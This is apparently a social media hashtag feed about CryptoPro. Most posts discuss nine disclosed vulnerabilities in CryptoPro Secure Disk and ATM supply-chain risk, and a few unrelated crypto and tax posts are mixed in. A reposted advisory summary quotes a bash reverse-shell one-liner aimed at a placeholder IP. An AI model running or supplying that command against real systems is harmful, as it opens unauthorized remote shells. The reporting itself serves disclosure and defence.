#cryptopro
⚡ Russia develops FSB-approved browser with domestic encryption as alternative to Google Chrome.

united24media.com/world/russia...
Russia Develops FSB-Approved Browser With Domestic Encryption as Alternative to Google Chrome
Russia's CryptoPro Browser, developed by CryptoPro with FSB-approved encryption, aims to replace Chrome after the CryptoPro plugin's 2025 removal.
united24media.com
September 8, 2026 at 3:17 PM
Someone please remind me to write up about that Russian usb cryptographic token that's just a password locked flash drive with a funny APDU over USB/CCID

Then wrapped in CryptoPro key container without any extra security lol
October 15, 2025 at 8:19 PM
ATM flaws reveal supply chain's silent threat

A researcher found nine flaws in CryptoPro Secure Disk, used in ATMs and other critical systems, allowing encryption bypass.

One component, many potential points of failure.
August 31, 2026 at 11:05 AM
Yes it’s true - crypto transactions need to be reported on your tax return! Check out our site for more info.

#crypto #cryptonews #cryptotax #taxes #TaxFiling #taxfilingseason #cryptoinvestor #cryptotrader #cryptopro #cryptotaxespro #taxseason #bitcoin #etheruem #crypto #bookkeeping #taxseason
December 1, 2024 at 2:44 PM
Nine flaws in CryptWare CryptoPro Secure Disk may enable pre-boot code execution, encryption bypass, and ATM jackpotting risks. Findings by Matt Burch will be presented at Black Hat USA 2026. #CryptoPro #ATMJackpotting #USA
Fresh ATM Crypto Software Bugs: Jackpot or Bust?
A researcher uncovered nine vulnerabilities in CryptWare CryptoPro Secure Disk, a pre-boot encryption tool used in enterprise environments and possibly within Diebold Nixdorf ATM security components. The findings suggest attackers could potentially bypass encryption, run arbitrary code during pre-boot, and steal cash through ATM jackpotting, though Diebold disputes the direct impact on its machines. #CryptWare #CryptoProSecureDisk #DieboldNixdorf #VynamicSecuritySuite #Ploutus
www.hendryadrian.com
July 11, 2026 at 7:45 AM
November 30, 2024 at 1:28 PM
Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft
Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft
Multiple vulnerabilities have been discovered in CryptoPro Secure Disk (CPSD) for BitLocker, a widely used encryption solution. These flaws could allow an attacker with physical access to a device to gain persistent root access and steal sensitive credentials . The issues identified by security researchers at SEC Consult Vulnerability Lab highlight significant risks for organizations that rely on this software for data protection. CVE CVSS Details CVE-2025-10010 N/A Integrity bypass enables root code execution. N/A N/A Cleartext /tmp data exposes credentials. Integrity Validation Bypass The first vulnerability, designated as CVE-2025-10010, involves an integrity validation bypass. CryptoPro Secure Disk boots a minimal Linux operating system to authenticate users, then decrypts the Windows partition with BitLocker . This Linux system resides on an unencrypted partition, accessible to anyone who can physically reach the hard drive or boot the system from an external medium. While the system uses the Linux kernel’s Integrity Measurement Architecture (IMA) to verify files , researchers found that IMA does not validate certain configuration files. bash -c ‘exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 <&1' & By manipulating these files, an attacker can execute arbitrary code with root privileges . This could allow them to plant a backdoor and monitor or access data during execution without triggering any system errors. Product Vulnerable Versions Fixed Versions CPSD CryptoPro Secure Disk < 7.6.6 / < 7.7.1 7.6.6 / 7.7.1 ClearText Storage of Sensitive Data The second issue concerns the storage of sensitive data in clear text . When users forget their credentials, CryptoPro Secure Disk offers an online support feature that connects to a predefined network. According to SEC Consult , to facilitate this connection, the system stores necessary secrets, such as certificates and passwords, in cleartext within the temporary ‘/tmp’ folder. If an attacker has already gained access to the Linux environment , perhaps through the first vulnerability, they can easily read these files. Cleartext certificate credentials expose WLAN access and enable 802.1X bypass(source : sec-consult) This information could then be used to access internal networks or bypass network access controls, further compromising the organization’s infrastructure. The vendor, CPSD, was notified of these issues in June 2025 and has since provided patches. Versions 7.6.6 and 7.7.1 address the vulnerabilities. Organizations using CryptoPro Secure Disk should update their software immediately. If updating is not immediately possible, the vendor recommends encrypting the PBA partition, a feature available since version 7.6.0. Starting with version 7.7, this encryption is enabled by default, mitigating the risk of unauthorized file modifications. SEC Consult also advises organizations to conduct thorough security reviews of their encryption solutions to identify and address any other potential weaknesses. Follow us on  Google News ,  LinkedIn , and  X  to Get More Instant Updates ,  Set CSN as a Preferred Source in  Google . The post Multiple Vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker Allow Root Access and Credential Theft appeared first on Cyber Security News .
cybersecuritynews.com
February 25, 2026 at 7:24 AM
I want to note the thing is only half the price of a full actual token that does Russian cryptography on board rather than letting CryptoPro pull a key out

Or anyone who knows the comms, lol
October 15, 2025 at 8:20 PM
I recently sat down with @darkreading.bsky.social to discuss my new research into CryptoPro and my @blackhatevents.bsky.social and @defcon.bsky.social talk Exploiting the ATM Supply Chain.. I look forward to catching you this summer 🏧💰
Atredian Matt (@emptynebuli.bsky.social) spoke with @DarkReading.bsky.social about his upcoming @BlackHatofficial.bsky.social talk "The Cost of Obscurity: Exploiting the ATM Supply Chain" 🔒️ 💵
Bottom line: Disk encryption doesn't help if the keys are stored right next to the lock.
Fresh ATM Crypto Software Bugs: Jackpot or Bust?
Organizations, and possibly ATMs, are at risk of compromise, thanks to holes in a Microsoft BitLocker security wrapper.
www.darkreading.com
July 10, 2026 at 9:19 PM
At DEFCON32 I presented 6 CE bugs in Diebold Nixdorf and now I'm BACK at @defcon.bsky.social with 9 more CVEs in the CryptoPro supply chain!!! Don't miss my talk "Compounding Interest: Exploiting the ATM Supply Chain"
9 CVEs, 1 new tool, and a deep dive into the ATM supply chain.

@defcon.bsky.social is exactly 1 week out! Catch Matt Burch (@emptynebuli.bsky.social) present Compounding Interest: Exploiting the ATM Supply Chain.

🗓️ AUG 8, 12:30PM
📍 Main Track 4
#DEFCON #DEFCON34 #Hacking
DEF CON® 34 Hacking Conference - Main Stage Talks
1.1 Million Cameras, One Wildcard: Architectural Surveillance in an IoT Cloud Sammy Azdoufal
defcon.org
July 30, 2026 at 2:18 PM
@defcon.bsky.social is just a little more than 2 weeks out and I am pleased to announce I will be adding my CryptoPro research to the @paymentvillage.bsky.social CTF - $$$$$__$$$$$!!! Don't miss the chance for real world application of my research.
www.defcon.org/html/defcon-...
DEF CON® 34 Hacking Conference - Contests
www.defcon.org
July 20, 2026 at 12:39 PM
Heute morgen erst die #Crypto Kurse auf #CryptoPro angeschaut. Die #Top10 der #Währungen hatte ein #Pump zwischen 5 und 10 Prozent. Das sah dann gleich nach deutlich Pro #Trump bei der #Election2024 aus. #USA #Kapitalmarkt #Börse #BTC #ETH #XRP #ADA #Ripple #Krypto
November 6, 2024 at 6:02 AM
@defcon.bsky.social 32 Matt (@emptynebuli.bsky.social) released 6 CE bugs affecting Diebold Nixdorf.. and now he is back with 9 more via the CryptoPro supply chain! 👀 Come join his #BHUSA briefing on Wednesday August 5th - you won't want to miss it! 🏧 🏦 @blackhatofficial.bsky.social
Black Hat USA 2026
Black Hat USA 2026
blackhat.com
July 13, 2026 at 6:27 PM
I am excited to announce that I will be presenting "Compounding Interest: Exploiting the ATM Supply Chain" at
#GrrCon in GrandRapids MI on September 25th. In this talk I will continue to cover my latest ATM research into exploiting CryptoPro and Diebold!

grrcon.com/presentation...
Presentations 2026 - GrrCON Cyber Security and Hacker conference
Presentations 2026 GrrCON 2026 Presentations Two days. Four tracks. No egos. No divas. Just a good time and good content. Keynotes Thursday · OpeningGrrCON Awakening: Truth, Tactic, Talent - How Human...
grrcon.com
August 25, 2026 at 8:43 PM
If you're into crypto, CryptoPro Network is a fantastic resource for staying updated and learning more about the latest trends and insights. https://cryptopronetworkcom.org
September 13, 2026 at 5:15 PM
cryptopro does not publicly publish its patch notes. and this is not niche software. cryptware says hundreds of customers use it across banking, government, healthcare, automotive, manufacturing, and more.
September 9, 2026 at 12:05 PM
there is also a real dispute. burch calls cryptopro foundational to diebold nixdorf's security suite. diebold says only two of the nine flaws ever applied to its systems. so how much this touched real atms is genuinely contested.
September 9, 2026 at 12:05 PM
so a company that builds cryptopro into its own product may never learn that a component buried deep in its stack was vulnerable and quietly patched. they cannot apply a fix they never knew they needed. the flaw gets fixed at the source and stays open everywhere downstream, silently.
September 9, 2026 at 12:05 PM
at black hat and defcon this year, he laid out nine vulnerabilities in a product called cryptopro secure disk. it is full-disk encryption and pre-boot authentication, the layer that is supposed to protect an atm's data even if someone rips the drive out or tampers with the machine.
September 9, 2026 at 12:05 PM
this is insanity. the encryption software is buried inside banking, healthcare, and govt products, and cryptopro does not even publish patch notes? they quietly fix a flaw, and nobody downstream ever finds out their tech was vulnerable. how do you patch when you have no clue something is broken?
September 7, 2026 at 4:04 AM